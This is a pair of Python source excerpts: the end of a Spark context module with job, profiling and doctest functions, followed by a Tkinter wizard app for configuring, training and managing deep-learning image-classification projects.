def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
app.py
|
import os
import re
import sys
import shutil
import json
import traceback
import numpy.core._dtype_ctypes
import PIL.Image as PilImage
import threading
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
from tkinter import filedialog
from constants import *
from config import ModelConfig
from make_dataset import DataSets
from trains import Trains
from category import category_extract, SIMPLE_CATEGORY_MODEL
class Wizard:
job: threading.Thread
current_task: Trains
is_task_running: bool = False
def __init__(self, parent):
self.layout = {
'global': {
'start': {'x': 15, 'y': 20},
'space': {'x': 15, 'y': 25},
'tiny_space': {'x': 5, 'y': 10}
}
}
self.parent = parent
self.parent.iconbitmap(Wizard.resource_path("resource/icon.ico"))
self.current_project: str = ""
self.project_root_path = "./projects"
if not os.path.exists(self.project_root_path):
os.makedirs(self.project_root_path)
self.parent.title('Image Classification Wizard Tool based on Deep Learning')
self.parent.resizable(width=False, height=False)
self.window_width = 815
self.window_height = 780
screenwidth = self.parent.winfo_screenwidth()
screenheight = self.parent.winfo_screenheight()
size = '%dx%d+%d+%d' % (
self.window_width,
self.window_height,
(screenwidth - self.window_width) / 2,
(screenheight - self.window_height) / 2
)
self.parent.geometry(size)
self.parent.bind('<Button-1>', lambda x: self.blank_click(x))
# ============================= Group 1 =====================================
self.label_frame_source = ttk.Labelframe(self.parent, text='Sample Source')
self.label_frame_source.place(
x=self.layout['global']['start']['x'],
y=self.layout['global']['start']['y'],
width=790,
height=150
)
# 训练集源路径 - 标签
self.dataset_train_path_text = ttk.Label(self.parent, text='Training Path', anchor=tk.W)
self.inside_widget(
src=self.dataset_train_path_text,
target=self.label_frame_source,
width=90,
height=20
)
# 训练集源路径 - 输入控件
self.source_train_path_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.next_to_widget(
src=self.source_train_path_listbox,
target=self.dataset_train_path_text,
width=600,
height=50,
tiny_space=True
)
self.source_train_path_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.source_train_path_listbox)
)
self.listbox_scrollbar(self.source_train_path_listbox)
# 训练集源路径 - 按钮
self.btn_browse_train = ttk.Button(
self.parent, text='Browse', command=lambda: self.browse_dataset(DatasetType.Directory, RunMode.Trains)
)
self.next_to_widget(
src=self.btn_browse_train,
target=self.source_train_path_listbox,
width=60,
height=24,
tiny_space=True
)
# 验证集源路径 - 标签
label_edge = self.object_edge_info(self.dataset_train_path_text)
widget_edge = self.object_edge_info(self.source_train_path_listbox)
self.dataset_validation_path_text = ttk.Label(self.parent, text='Validation Path', anchor=tk.W)
self.dataset_validation_path_text.place(
x=label_edge['x'],
y=widget_edge['edge_y'] + self.layout['global']['space']['y'] / 2,
width=90,
height=20
)
# 验证集源路径 - 输入控件
self.source_validation_path_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.next_to_widget(
src=self.source_validation_path_listbox,
target=self.dataset_validation_path_text,
width=600,
height=50,
tiny_space=True
)
self.source_validation_path_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.source_validation_path_listbox)
)
self.listbox_scrollbar(self.source_validation_path_listbox)
# 训练集源路径 - 按钮
self.btn_browse_validation = ttk.Button(
self.parent, text='Browse', command=lambda: self.browse_dataset(DatasetType.Directory, RunMode.Validation)
)
self.next_to_widget(
src=self.btn_browse_validation,
target=self.source_validation_path_listbox,
width=60,
height=24,
tiny_space=True
)
# ============================= Group 2 =====================================
self.label_frame_neu = ttk.Labelframe(self.parent, text='Neural network')
self.below_widget(
src=self.label_frame_neu,
target=self.label_frame_source,
width=790,
height=120,
tiny_space=False
)
# 最大标签数目 - 标签
self.label_num_text = ttk.Label(self.parent, text='Label Num', anchor=tk.W)
self.inside_widget(
src=self.label_num_text,
target=self.label_frame_neu,
width=65,
height=20,
)
# 最大标签数目 - 滚动框
self.label_num_spin = ttk.Spinbox(self.parent, from_=1, to=12)
self.label_num_spin.set(1)
self.next_to_widget(
src=self.label_num_spin,
target=self.label_num_text,
width=50,
height=20,
tiny_space=True
)
# 图像通道 - 标签
self.channel_text = ttk.Label(self.parent, text='Channel', anchor=tk.W)
self.next_to_widget(
src=self.channel_text,
target=self.label_num_spin,
width=50,
height=20,
tiny_space=False
)
# 图像通道 - 下拉框
self.comb_channel = ttk.Combobox(self.parent, values=(3, 1), state='readonly')
self.comb_channel.current(0)
self.next_to_widget(
src=self.comb_channel,
target=self.channel_text,
width=38,
height=20,
tiny_space=True
)
# 卷积层 - 标签
self.neu_cnn_text = ttk.Label(self.parent, text='CNN Layer', anchor=tk.W)
self.next_to_widget(
src=self.neu_cnn_text,
target=self.comb_channel,
width=65,
height=20,
tiny_space=False
)
# 卷积层 - 下拉框
self.comb_neu_cnn = ttk.Combobox(self.parent, values=[_.name for _ in CNNNetwork], state='readonly')
self.comb_neu_cnn.current(0)
self.next_to_widget(
src=self.comb_neu_cnn,
target=self.neu_cnn_text,
width=80,
height=20,
tiny_space=True
)
# 循环层 - 标签
self.neu_recurrent_text = ttk.Label(self.parent, text='Recurrent Layer', anchor=tk.W)
self.next_to_widget(
src=self.neu_recurrent_text,
target=self.comb_neu_cnn,
width=95,
height=20,
tiny_space=False
)
# 循环层 - 下拉框
self.comb_recurrent = ttk.Combobox(self.parent, values=[_.name for _ in RecurrentNetwork], state='readonly')
self.comb_recurrent.current(0)
self.next_to_widget(
src=self.comb_recurrent,
target=self.neu_recurrent_text,
width=112,
height=20,
tiny_space=True
)
self.comb_recurrent.bind("<<ComboboxSelected>>", lambda x: self.auto_loss(x))
# 循环层单元数 - 标签
self.units_num_text = ttk.Label(self.parent, text='UnitsNum', anchor=tk.W)
self.next_to_widget(
src=self.units_num_text,
target=self.comb_recurrent,
width=60,
height=20,
tiny_space=False
)
# 循环层单元数 - 下拉框
self.units_num_spin = ttk.Spinbox(self.parent, from_=16, to=512, increment=16, wrap=True)
self.units_num_spin.set(64)
self.next_to_widget(
src=self.units_num_spin,
target=self.units_num_text,
width=55,
height=20,
tiny_space=True
)
# 损失函数 - 标签
self.loss_func_text = ttk.Label(self.parent, text='Loss Function', anchor=tk.W)
self.below_widget(
src=self.loss_func_text,
target=self.label_num_text,
width=85,
height=20,
tiny_space=True
)
# 损失函数 - 下拉框
self.comb_loss = ttk.Combobox(self.parent, values=[_.name for _ in LossFunction], state='readonly')
self.comb_loss.current(0)
self.next_to_widget(
src=self.comb_loss,
target=self.loss_func_text,
width=101,
height=20,
tiny_space=True
)
# 优化器 - 标签
self.optimizer_text = ttk.Label(self.parent, text='Optimizer', anchor=tk.W)
self.next_to_widget(
src=self.optimizer_text,
target=self.comb_loss,
width=60,
height=20,
tiny_space=False
)
# 优化器 - 下拉框
self.comb_optimizer = ttk.Combobox(self.parent, values=[_.name for _ in Optimizer], state='readonly')
self.comb_optimizer.current(0)
self.next_to_widget(
src=self.comb_optimizer,
target=self.optimizer_text,
width=88,
height=20,
tiny_space=True
)
# 学习率 - 标签
self.learning_rate_text = ttk.Label(self.parent, text='Learning Rate', anchor=tk.W)
self.next_to_widget(
src=self.learning_rate_text,
target=self.comb_optimizer,
width=85,
height=20,
tiny_space=False
)
# 学习率 - 滚动框
self.learning_rate_spin = ttk.Spinbox(self.parent, from_=0.00001, to=0.1, increment='0.0001')
self.learning_rate_spin.set(0.001)
self.next_to_widget(
src=self.learning_rate_spin,
target=self.learning_rate_text,
width=67,
height=20,
tiny_space=True
)
# Resize - 标签
self.resize_text = ttk.Label(self.parent, text='Resize', anchor=tk.W)
self.next_to_widget(
src=self.resize_text,
target=self.learning_rate_spin,
width=36,
height=20,
tiny_space=False
)
# Resize - 输入框
self.resize_val = tk.StringVar()
self.resize_val.set('[150, 50]')
self.resize_entry = ttk.Entry(self.parent, textvariable=self.resize_val, justify=tk.LEFT)
self.next_to_widget(
src=self.resize_entry,
target=self.resize_text,
width=60,
height=20,
tiny_space=True
)
# Size - 标签
self.size_text = ttk.Label(self.parent, text='Size', anchor=tk.W)
self.next_to_widget(
src=self.size_text,
target=self.resize_entry,
width=30,
height=20,
tiny_space=False
)
# Size - 输入框
self.size_val = tk.StringVar()
self.size_val.set('[-1, -1]')
self.size_entry = ttk.Entry(self.parent, textvariable=self.size_val, justify=tk.LEFT)
self.next_to_widget(
src=self.size_entry,
target=self.size_text,
width=60,
height=20,
tiny_space=True
)
# 类别 - 标签
self.category_text = ttk.Label(self.parent, text='Category', anchor=tk.W)
self.below_widget(
src=self.category_text,
target=self.loss_func_text,
width=72,
height=20,
tiny_space=True
)
# 类别 - 下拉框
self.comb_category = ttk.Combobox(self.parent, values=(
'CUSTOMIZED',
'NUMERIC',
'ALPHANUMERIC',
'ALPHANUMERIC_LOWER',
'ALPHANUMERIC_UPPER',
'ALPHABET_LOWER',
'ALPHABET_UPPER',
'ALPHABET',
'ARITHMETIC',
'FLOAT',
'CHS_3500',
'ALPHANUMERIC_CHS_3500_LOWER'
), state='readonly')
self.comb_category.current(1)
self.comb_category.bind("<<ComboboxSelected>>", lambda x: self.comb_category_callback(x))
self.next_to_widget(
src=self.comb_category,
target=self.category_text,
width=225,
height=20,
tiny_space=True
)
# 类别 - 自定义输入框
self.category_val = tk.StringVar()
self.category_val.set('')
self.category_entry = ttk.Entry(self.parent, textvariable=self.category_val, justify=tk.LEFT, state=tk.DISABLED)
self.next_to_widget(
src=self.category_entry,
target=self.comb_category,
width=440,
height=20,
tiny_space=False
)
# ============================= Group 3 =====================================
self.label_frame_train = ttk.Labelframe(self.parent, text='Training Configuration')
self.below_widget(
src=self.label_frame_train,
target=self.label_frame_neu,
width=790,
height=60,
tiny_space=True
)
# 任务完成标准 - 准确率 - 标签
self.end_acc_text = ttk.Label(self.parent, text='End Accuracy', anchor=tk.W)
self.inside_widget(
src=self.end_acc_text,
target=self.label_frame_train,
width=85,
height=20,
)
# 任务完成标准 - 准确率 - 输入框
self.end_acc_val = tk.DoubleVar()
self.end_acc_val.set(0.95)
self.end_acc_entry = ttk.Entry(self.parent, textvariable=self.end_acc_val, justify=tk.LEFT)
self.next_to_widget(
src=self.end_acc_entry,
target=self.end_acc_text,
width=56,
height=20,
tiny_space=True
)
# 任务完成标准 - 平均损失 - 标签
self.end_cost_text = ttk.Label(self.parent, text='End Cost', anchor=tk.W)
self.next_to_widget(
src=self.end_cost_text,
target=self.end_acc_entry,
width=60,
height=20,
tiny_space=False
)
# 任务完成标准 - 平均损失 - 输入框
self.end_cost_val = tk.DoubleVar()
self.end_cost_val.set(0.5)
self.end_cost_entry = ttk.Entry(self.parent, textvariable=self.end_cost_val, justify=tk.LEFT)
self.next_to_widget(
src=self.end_cost_entry,
target=self.end_cost_text,
width=58,
height=20,
tiny_space=True
)
# 任务完成标准 - 循环轮次 - 标签
self.end_epochs_text = ttk.Label(self.parent, text='End Epochs', anchor=tk.W)
self.next_to_widget(
src=self.end_epochs_text,
target=self.end_cost_entry,
width=72,
height=20,
tiny_space=False
)
# 任务完成标准 - 循环轮次 - 输入框
self.end_epochs_spin = ttk.Spinbox(self.parent, from_=0, to=10000)
self.end_epochs_spin.set(2)
self.next_to_widget(
src=self.end_epochs_spin,
target=self.end_epochs_text,
width=50,
height=20,
tiny_space=True
)
# 训练批次大小 - 标签
self.batch_size_text = ttk.Label(self.parent, text='Train BatchSize', anchor=tk.W)
self.next_to_widget(
src=self.batch_size_text,
target=self.end_epochs_spin,
width=90,
height=20,
tiny_space=False
)
# 训练批次大小 - 输入框
self.batch_size_val = tk.IntVar()
self.batch_size_val.set(64)
self.batch_size_entry = ttk.Entry(self.parent, textvariable=self.batch_size_val, justify=tk.LEFT)
self.next_to_widget(
src=self.batch_size_entry,
target=self.batch_size_text,
width=40,
height=20,
tiny_space=True
)
# 验证批次大小 - 标签
self.validation_batch_size_text = ttk.Label(self.parent, text='Validation BatchSize', anchor=tk.W)
self.next_to_widget(
src=self.validation_batch_size_text,
target=self.batch_size_entry,
width=120,
height=20,
tiny_space=False
)
# 验证批次大小 - 输入框
self.validation_batch_size_val = tk.IntVar()
self.validation_batch_size_val.set(300)
self.validation_batch_size_entry = ttk.Entry(self.parent, textvariable=self.validation_batch_size_val, justify=tk.LEFT)
self.next_to_widget(
src=self.validation_batch_size_entry,
target=self.validation_batch_size_text,
width=40,
height=20,
tiny_space=True
)
# ============================= Group 4 =====================================
self.label_frame_augmentation = ttk.Labelframe(self.parent, text='Data Augmentation')
self.below_widget(
src=self.label_frame_augmentation,
target=self.label_frame_train,
width=790,
height=90,
tiny_space=True
)
# 二值化 - 标签
self.binaryzation_text = ttk.Label(self.parent, text='Binaryzation', anchor=tk.W)
self.inside_widget(
src=self.binaryzation_text,
target=self.label_frame_augmentation,
width=72,
height=20,
)
# 二值化 - 输入框
self.binaryzation_val = tk.IntVar()
self.binaryzation_val.set(-1)
self.binaryzation_entry = ttk.Entry(self.parent, textvariable=self.binaryzation_val, justify=tk.LEFT)
self.next_to_widget(
src=self.binaryzation_entry,
target=self.binaryzation_text,
width=55,
height=20,
tiny_space=True
)
# 滤波 - 标签
self.median_blur_text = ttk.Label(self.parent, text='Median Blur', anchor=tk.W)
self.next_to_widget(
src=self.median_blur_text,
target=self.binaryzation_entry,
width=80,
height=20,
tiny_space=False
)
# 滤波 - 输入框
self.median_blur_val = tk.IntVar()
self.median_blur_val.set(-1)
self.median_blur_entry = ttk.Entry(self.parent, textvariable=self.median_blur_val, justify=tk.LEFT)
self.next_to_widget(
src=self.median_blur_entry,
target=self.median_blur_text,
width=52,
height=20,
tiny_space=True
)
# 高斯模糊 - 标签
self.gaussian_blur_text = ttk.Label(self.parent, text='Gaussian Blur', anchor=tk.W)
self.next_to_widget(
src=self.gaussian_blur_text,
target=self.median_blur_entry,
width=85,
height=20,
tiny_space=False
)
# 高斯模糊 - 输入框
self.gaussian_blur_val = tk.IntVar()
self.gaussian_blur_val.set(-1)
self.gaussian_blur_entry = ttk.Entry(self.parent, textvariable=self.gaussian_blur_val, justify=tk.LEFT)
self.next_to_widget(
src=self.gaussian_blur_entry,
target=self.gaussian_blur_text,
width=62,
height=20,
tiny_space=True
)
# 直方图均衡化 - 多选框
self.equalize_hist_val = tk.IntVar()
self.equalize_hist_val.set(0)
self.equalize_hist = ttk.Checkbutton(
self.parent, text='EqualizeHist', variable=self.equalize_hist_val, offvalue=0
)
self.next_to_widget(
src=self.equalize_hist,
target=self.gaussian_blur_entry,
width=100,
height=20,
tiny_space=False
)
# 拉普拉斯 - 多选框
self.laplace_val = tk.IntVar()
self.laplace_val.set(0)
self.laplace = ttk.Checkbutton(
self.parent, text='Laplace', variable=self.laplace_val, onvalue=1, offvalue=0
)
self.next_to_widget(
src=self.laplace,
target=self.equalize_hist,
width=64,
height=20,
tiny_space=False
)
# 旋转 - 标签
self.rotate_text = ttk.Label(self.parent, text='Rotate (0-90)', anchor=tk.W)
self.below_widget(
src=self.rotate_text,
target=self.binaryzation_text,
width=72,
height=20,
tiny_space=True
)
# 旋转 - 输入框
self.rotate_val = tk.IntVar()
self.rotate_val.set(-1)
self.rotate_entry = ttk.Entry(self.parent, textvariable=self.rotate_val, justify=tk.LEFT)
self.next_to_widget(
src=self.rotate_entry,
target=self.rotate_text,
width=55,
height=20,
tiny_space=True
)
# 椒盐噪声 - 标签
self.sp_noise_text = ttk.Label(self.parent, text='Pepper Noise (0-1)', anchor=tk.W)
self.next_to_widget(
src=self.sp_noise_text,
target=self.rotate_entry,
width=110,
height=20,
tiny_space=False
)
# 椒盐噪声 - 输入框
self.sp_noise_val = tk.DoubleVar()
self.sp_noise_val.set(-1)
self.sp_noise_entry = ttk.Entry(self.parent, textvariable=self.sp_noise_val, justify=tk.LEFT)
self.next_to_widget(
src=self.sp_noise_entry,
target=self.sp_noise_text,
width=71,
height=20,
tiny_space=True
)
# 透视变换 - 多选框
self.warp_perspective_val = tk.IntVar()
self.warp_perspective_val.set(0)
self.warp_perspective = ttk.Checkbutton(
self.parent, text='Warp Perspective', variable=self.warp_perspective_val, onvalue=1, offvalue=0
)
self.next_to_widget(
src=self.warp_perspective,
target=self.sp_noise_entry,
width=130,
height=20,
tiny_space=False
)
# ============================= Group 5 =====================================
self.label_frame_project = ttk.Labelframe(self.parent, text='Project Configuration')
self.below_widget(
src=self.label_frame_project,
target=self.label_frame_augmentation,
width=790,
height=60,
tiny_space=True
)
# 项目名 - 标签
self.project_name_text = ttk.Label(self.parent, text='Project Name', anchor=tk.W)
self.inside_widget(
src=self.project_name_text,
target=self.label_frame_project,
width=90,
height=20
)
# 项目名 - 下拉输入框
self.comb_project_name = ttk.Combobox(self.parent)
self.next_to_widget(
src=self.comb_project_name,
target=self.project_name_text,
width=430,
height=20,
tiny_space=True
)
self.comb_project_name.bind(
sequence="<Return>",
func=lambda x: self.project_name_fill_callback(x)
)
self.comb_project_name.bind(
sequence="<Button-1>",
func=lambda x: self.fetch_projects()
)
self.comb_project_name.bind("<<ComboboxSelected>>", lambda x: self.read_conf(x))
# 保存配置 - 按钮
self.btn_save_conf = ttk.Button(
self.parent, text='Save Configuration', command=lambda: self.save_conf()
)
self.next_to_widget(
src=self.btn_save_conf,
target=self.comb_project_name,
width=130,
height=24,
tiny_space=False,
offset_y=-2
)
# 删除项目 - 按钮
self.btn_delete = ttk.Button(
self.parent, text='Delete', command=lambda: self.delete_project()
)
self.next_to_widget(
src=self.btn_delete,
target=self.btn_save_conf,
width=80,
height=24,
tiny_space=False,
)
# ============================= Group 6 =====================================
self.label_frame_dataset = ttk.Labelframe(
self.parent, text='Sample Dataset'
)
self.below_widget(
src=self.label_frame_dataset,
target=self.label_frame_project,
width=790,
height=170,
tiny_space=True
)
# 附加训练集 - 按钮
self.btn_attach_dataset = ttk.Button(
self.parent,
text='Attach Dataset',
command=lambda: self.attach_dataset()
)
self.inside_widget(
src=self.btn_attach_dataset,
target=self.label_frame_dataset,
width=120,
height=24,
)
# 附加训练集 - 显示框
self.attach_dataset_val = tk.StringVar()
self.attach_dataset_val.set('')
self.attach_dataset_entry = ttk.Entry(
self.parent, textvariable=self.attach_dataset_val, justify=tk.LEFT, state=tk.DISABLED
)
self.next_to_widget(
src=self.attach_dataset_entry,
target=self.btn_attach_dataset,
width=420,
height=24,
tiny_space=True
)
# 验证集数目 - 标签
self.validation_num_text = ttk.Label(self.parent, text='Validation Set Num', anchor=tk.W)
self.next_to_widget(
src=self.validation_num_text,
target=self.attach_dataset_entry,
width=120,
height=20,
tiny_space=False,
offset_y=2
)
# 验证集数目 - 输入框
self.validation_num_val = tk.IntVar()
self.validation_num_val.set(300)
self.validation_num_entry = ttk.Entry(self.parent, textvariable=self.validation_num_val, justify=tk.LEFT)
self.next_to_widget(
src=self.validation_num_entry,
target=self.validation_num_text,
width=71,
height=20,
tiny_space=True
)
# 训练集路径 - 标签
self.dataset_train_path_text = ttk.Label(self.parent, text='Training Dataset', anchor=tk.W)
self.below_widget(
src=self.dataset_train_path_text,
target=self.btn_attach_dataset,
width=100,
height=20,
tiny_space=False
)
# 训练集路径 - 列表框
self.dataset_train_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.next_to_widget(
src=self.dataset_train_listbox,
target=self.dataset_train_path_text,
width=640,
height=36,
tiny_space=False
)
self.dataset_train_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.dataset_train_listbox)
)
self.listbox_scrollbar(self.dataset_train_listbox)
# 验证集路径 - 标签
label_edge = self.object_edge_info(self.dataset_train_path_text)
widget_edge = self.object_edge_info(self.dataset_train_listbox)
self.dataset_validation_path_text = ttk.Label(self.parent, text='Validation Dataset', anchor=tk.W)
self.dataset_validation_path_text.place(
x=label_edge['x'],
y=widget_edge['edge_y'] + self.layout['global']['space']['y'] / 2,
width=100,
height=20
)
# 验证集路径 - 下拉输入框
self.dataset_validation_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.next_to_widget(
src=self.dataset_validation_listbox,
target=self.dataset_validation_path_text,
width=640,
height=36,
tiny_space=False
)
self.dataset_validation_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.dataset_validation_listbox)
)
self.listbox_scrollbar(self.dataset_validation_listbox)
self.sample_map = {
DatasetType.Directory: {
RunMode.Trains: self.source_train_path_listbox,
RunMode.Validation: self.source_validation_path_listbox
},
DatasetType.TFRecords: {
RunMode.Trains: self.dataset_train_listbox,
RunMode.Validation: self.dataset_validation_listbox
}
}
# 开始训练 - 按钮
self.btn_training = ttk.Button(self.parent, text='Start Training', command=lambda: self.start_training())
self.widget_from_right(
src=self.btn_training,
target=self.label_frame_dataset,
width=120,
height=24,
tiny_space=True
)
# 终止训练 - 按钮
self.btn_stop = ttk.Button(self.parent, text='Stop', command=lambda: self.stop_training())
self.button_state(self.btn_stop, tk.DISABLED)
self.before_widget(
src=self.btn_stop,
target=self.btn_training,
width=60,
height=24,
tiny_space=True
)
# 编译模型 - 按钮
self.btn_compile = ttk.Button(self.parent, text='Compile', command=lambda: self.compile())
self.before_widget(
src=self.btn_compile,
target=self.btn_stop,
width=80,
height=24,
tiny_space=True
)
# 打包训练集 - 按钮
self.btn_make_dataset = ttk.Button(self.parent, text='Make Dataset', command=lambda: self.make_dataset())
self.before_widget(
src=self.btn_make_dataset,
target=self.btn_compile,
width=120,
height=24,
tiny_space=True
)
# 打包训练集 - 按钮
self.btn_reset_history = ttk.Button(
self.parent, text='Reset History', command=lambda: self.reset_history()
)
self.before_widget(
src=self.btn_reset_history,
target=self.btn_make_dataset,
width=120,
height=24,
tiny_space=True
)
def widget_from_right(self, src, target, width, height, tiny_space=False):
target_edge = self.object_edge_info(target)
src.place(
x=self.window_width - width - self.layout['global']['space']['x'],
y=target_edge['edge_y'] + self.layout['global']['tiny_space' if tiny_space else 'space']['y'],
width=width,
height=height
)
def before_widget(self, src, target, width, height, tiny_space=False):
target_edge = self.object_edge_info(target)
src.place(
x=target_edge['x'] - width - self.layout['global']['tiny_space' if tiny_space else 'space']['x'],
y=target_edge['y'],
width=width,
height=height
)
def inside_widget(self, src, target, width, height):
target_edge = self.object_edge_info(target)
src.place(
x=target_edge['x'] + self.layout['global']['space']['x'],
y=target_edge['y'] + self.layout['global']['space']['y'],
width=width,
height=height
)
def below_widget(self, src, target, width, height, tiny_space=False):
target_edge = self.object_edge_info(target)
src.place(
x=target_edge['x'],
y=target_edge['edge_y'] + self.layout['global']['tiny_space' if tiny_space else 'space']['y'],
width=width,
height=height
)
def next_to_widget(self, src, target, width, height, tiny_space=False, offset_y=0):
target_edge = self.object_edge_info(target)
src.place(
x=target_edge['edge_x'] + self.layout['global']['tiny_space' if tiny_space else 'space']['x'],
y=target_edge['y'] + offset_y,
width=width,
height=height
)
@staticmethod
def threading_exec(func, *args) -> threading.Thread:
th = threading.Thread(target=func, args=args)
th.setDaemon(True)
th.start()
return th
@staticmethod
def object_edge_info(obj):
info = obj.place_info()
x = int(info['x'])
y = int(info['y'])
edge_x = int(info['x']) + int(info['width'])
edge_y = int(info['y']) + int(info['height'])
return {'x': x, 'y': y, 'edge_x': edge_x, 'edge_y': edge_y}
@staticmethod
def listbox_scrollbar(listbox: tk.Listbox):
y_scrollbar = tk.Scrollbar(
listbox, command=listbox.yview
)
y_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
listbox.config(yscrollcommand=y_scrollbar.set)
def blank_click(self, event):
if self.current_project != self.comb_project_name.get():
self.project_name_fill_callback(event)
def project_name_fill_callback(self, event):
suffix = '-{}-{}-H{}-{}-C{}'.format(
self.comb_neu_cnn.get(),
self.comb_recurrent.get(),
self.units_num_spin.get(),
self.comb_loss.get(),
self.comb_channel.get(),
)
current_project_name = self.comb_project_name.get()
if len(current_project_name) > 0 and current_project_name not in self.project_names:
self.sample_map[DatasetType.Directory][RunMode.Trains].delete(0, tk.END)
self.sample_map[DatasetType.Directory][RunMode.Validation].delete(0, tk.END)
if not current_project_name.endswith(suffix):
self.comb_project_name.insert(tk.END, suffix)
self.current_project = self.comb_project_name.get()
self.update_dataset_files_path(mode=RunMode.Trains)
self.update_dataset_files_path(mode=RunMode.Validation)
@property
def project_path(self):
if not self.current_project:
return None
project_path = "{}/{}".format(self.project_root_path, self.current_project)
if not os.path.exists(project_path):
os.makedirs(project_path)
return project_path
def update_dataset_files_path(self, mode: RunMode):
dataset_name = "dataset/{}.0.tfrecords".format(mode.value)
dataset_path = os.path.join(self.project_path, dataset_name)
dataset_path = dataset_path.replace("\\", '/')
self.sample_map[DatasetType.TFRecords][mode].delete(0, tk.END)
self.sample_map[DatasetType.TFRecords][mode].insert(tk.END, dataset_path)
self.save_conf()
def attach_dataset(self):
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
filename = filedialog.askdirectory()
if not filename:
return
model_conf = ModelConfig(self.current_project)
if not self.check_dataset(model_conf):
return
self.attach_dataset_val.set(filename)
self.button_state(self.btn_attach_dataset, tk.DISABLED)
for mode in [RunMode.Trains, RunMode.Validation]:
attached_dataset_name = model_conf.dataset_increasing_name(mode)
attached_dataset_name = "dataset/{}".format(attached_dataset_name)
attached_dataset_path = os.path.join(self.project_path, attached_dataset_name)
attached_dataset_path = attached_dataset_path.replace("\\", '/')
self.sample_map[DatasetType.TFRecords][mode].insert(tk.END, attached_dataset_path)
self.save_conf()
self.threading_exec(
lambda: DataSets(model_conf).make_dataset(
trains_path=filename,
is_add=True,
callback=lambda: self.button_state(self.btn_attach_dataset, tk.NORMAL),
msg=lambda x: tk.messagebox.showinfo('Attach Dataset Status', x)
)
)
pass
@staticmethod
def button_state(btn: ttk.Button, state: str):
btn['state'] = state
def delete_project(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please select a project to delete."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
project_path = "./projects/{}".format(self.current_project)
try:
shutil.rmtree(project_path)
except Exception as e:
messagebox.showerror(
"Error!", json.dumps(e.args)
)
messagebox.showinfo(
"Error!", "Delete successful!"
)
self.comb_project_name.delete(0, tk.END)
def reset_history(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please select a project first."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
project_history_path = "./projects/{}/model".format(self.current_project)
try:
shutil.rmtree(project_history_path)
except Exception as e:
messagebox.showerror(
"Error!", json.dumps(e.args)
)
messagebox.showinfo(
"Error!", "Delete history successful!"
)
def auto_loss(self, event):
if self.comb_recurrent.get() == 'NoRecurrent':
self.comb_loss.set("CrossEntropy")
@staticmethod
def get_param(src: dict, key, default=None):
result = src.get(key)
return result if result else default
def read_conf(self, event):
selected = self.comb_project_name.get()
self.current_project = selected
model_conf = ModelConfig(selected)
self.size_val.set("[{}, {}]".format(model_conf.image_width, model_conf.image_height))
self.resize_val.set(json.dumps(model_conf.resize))
self.source_train_path_listbox.delete(0, tk.END)
self.source_validation_path_listbox.delete(0, tk.END)
self.dataset_validation_listbox.delete(0, tk.END)
self.dataset_train_listbox.delete(0, tk.END)
for source_train in self.get_param(model_conf.trains_path, DatasetType.Directory, default=[]):
self.source_train_path_listbox.insert(tk.END, source_train)
for source_validation in self.get_param(model_conf.validation_path, DatasetType.Directory, default=[]):
self.source_validation_path_listbox.insert(tk.END, source_validation)
self.label_num_spin.set(model_conf.max_label_num)
self.comb_channel.set(model_conf.image_channel)
self.comb_neu_cnn.set(model_conf.neu_cnn_param)
self.comb_recurrent.set(model_conf.neu_recurrent_param)
self.units_num_spin.set(model_conf.units_num)
self.comb_loss.set(model_conf.loss_func_param)
if isinstance(model_conf.category_param, list):
self.category_entry['state'] = tk.NORMAL
self.category_val.set(model_conf.category_param)
else:
self.category_entry['state'] = tk.DISABLED
self.comb_category.set(model_conf.category_param)
